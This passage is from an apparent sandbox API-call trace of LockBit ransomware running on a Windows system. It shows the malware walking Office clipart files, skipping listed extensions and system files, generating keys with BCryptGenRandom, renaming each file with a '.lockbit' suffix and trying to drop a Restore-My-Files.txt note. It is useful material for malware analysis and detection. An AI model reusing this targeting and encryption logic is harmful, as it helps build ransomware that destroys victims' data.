lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.341] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01066_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01066_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.341] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.341] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.342] free (_Block=0x1fa2ed8) [0162.342] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01066_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.342] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.343] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d55d00, ftCreationTime.dwHighDateTime=0x1bd4b03, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb0d55d00, ftLastWriteTime.dwHighDateTime=0x1bd4b03, nFileSizeHigh=0x0, nFileSizeLow=0x1a7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01069_.WMF", cAlternateFileName="")) returned 1 [0162.343] lstrcmpiW (lpString1=".", lpString2="NA01069_.WMF") returned -1 [0162.343] lstrcmpiW (lpString1="..", lpString2="NA01069_.WMF") returned -1 [0162.343] PathFindExtensionW (pszPath="NA01069_.WMF") returned=".WMF" [0162.343] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.343] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.344] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.344] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01069_.WMF") returned 1 [0162.345] lstrcmpiW (lpString1="ntldr", lpString2="NA01069_.WMF") returned 1 [0162.345] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01069_.WMF") returned 1 [0162.345] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01069_.WMF") returned -1 [0162.345] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01069_.WMF") returned -1 [0162.345] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01069_.WMF") returned 1 [0162.345] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01069_.WMF") returned -1 [0162.345] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.345] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01069_.WMF") returned=".WMF" [0162.345] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.345] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.345] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.346] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.346] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01069_.WMF.lockbit") returned 72 [0162.347] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01069_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01069_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0162.348] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.348] malloc (_Size=0x40068) returned 0x3f70048 [0162.348] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=6782) returned 1 [0162.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0162.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.349] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0162.349] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.354] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01069_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01069_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.354] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.354] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.355] free (_Block=0x1fa2ed8) [0162.355] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01069_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.355] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.355] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.356] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe19e000, ftCreationTime.dwHighDateTime=0x1bd4afd, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe19e000, ftLastWriteTime.dwHighDateTime=0x1bd4afd, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01123_.WMF", cAlternateFileName="")) returned 1 [0162.356] lstrcmpiW (lpString1=".", lpString2="NA01123_.WMF") returned -1 [0162.356] lstrcmpiW (lpString1="..", lpString2="NA01123_.WMF") returned -1 [0162.356] PathFindExtensionW (pszPath="NA01123_.WMF") returned=".WMF" [0162.356] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.356] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.357] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.357] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.358] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01123_.WMF") returned 1 [0162.358] lstrcmpiW (lpString1="ntldr", lpString2="NA01123_.WMF") returned 1 [0162.358] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01123_.WMF") returned 1 [0162.358] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01123_.WMF") returned -1 [0162.358] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01123_.WMF") returned -1 [0162.358] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01123_.WMF") returned 1 [0162.358] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01123_.WMF") returned -1 [0162.358] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.359] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01123_.WMF") returned=".WMF" [0162.359] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.359] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.359] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.360] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.360] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.360] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.360] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.360] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.360] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.360] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.360] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.360] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.360] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01123_.WMF.lockbit") returned 72 [0162.360] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01123_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01123_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0162.361] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.361] malloc (_Size=0x40068) returned 0x1ff1e60 [0162.361] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7680) returned 1 [0162.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.362] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0162.362] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.362] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0162.363] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.369] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01123_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01123_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.369] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.369] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.371] free (_Block=0x1fa2ed8) [0162.371] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01123_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.371] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.371] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.371] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23d3100, ftCreationTime.dwHighDateTime=0x1bd4ae1, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe23d3100, ftLastWriteTime.dwHighDateTime=0x1bd4ae1, nFileSizeHigh=0x0, nFileSizeLow=0xb70, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01126_.WMF", cAlternateFileName="")) returned 1 [0162.371] lstrcmpiW (lpString1=".", lpString2="NA01126_.WMF") returned -1 [0162.371] lstrcmpiW (lpString1="..", lpString2="NA01126_.WMF") returned -1 [0162.371] PathFindExtensionW (pszPath="NA01126_.WMF") returned=".WMF" [0162.371] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.371] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.371] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.371] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.371] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.371] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.372] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.372] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.373] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01126_.WMF") returned 1 [0162.373] lstrcmpiW (lpString1="ntldr", lpString2="NA01126_.WMF") returned 1 [0162.373] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01126_.WMF") returned 1 [0162.373] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01126_.WMF") returned -1 [0162.373] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01126_.WMF") returned -1 [0162.374] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01126_.WMF") returned 1 [0162.374] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01126_.WMF") returned -1 [0162.374] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft 